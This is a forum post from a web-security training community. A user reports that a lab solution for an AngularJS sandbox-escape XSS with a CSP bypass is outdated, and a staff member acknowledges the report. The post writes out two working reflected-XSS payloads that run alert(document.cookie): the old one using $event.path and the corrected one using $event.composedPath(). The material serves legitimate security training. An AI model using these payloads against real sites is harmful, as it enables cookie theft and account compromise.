Burp Suite User Forum


Wrong solution in WSA Expert lab XSS: Reflected XSS with AngularJS sandbox escape and CSP

Aetius | Last updated: Jan 19, 2023 09:42PM UTC

Hello, in the WSA Lab titled 'Reflected XSS with AngularJS sandbox escape and CSP', the solution section is wrong because it suggests this payload:

location='https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x';

But as mentioned at the end of one of your publications (https://portswigger.net/research/angularjs-csp-bypass-in-56-characters): 'Since Chrome 109 the path property has been removed. The workaround is to use composedPath() instead.'

So the new solution is:

location='https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cinput%20id=x%20ng-focus=$event.composedPath()|orderBy:%27(z=alert)(document.cookie)%27%3E#x';

I tested both in my up-to-date Chrome browser and also in the lab: only the solution containing $event.composedPath() instead of $event.path works and validates the challenge, so you should correct it in the writeup.

Thank you for your amazing learning material!

Michelle, PortSwigger Agent | Last updated: Jan 20, 2023 02:46PM UTC

Thanks for getting in touch :) We'll pass this on to the team.
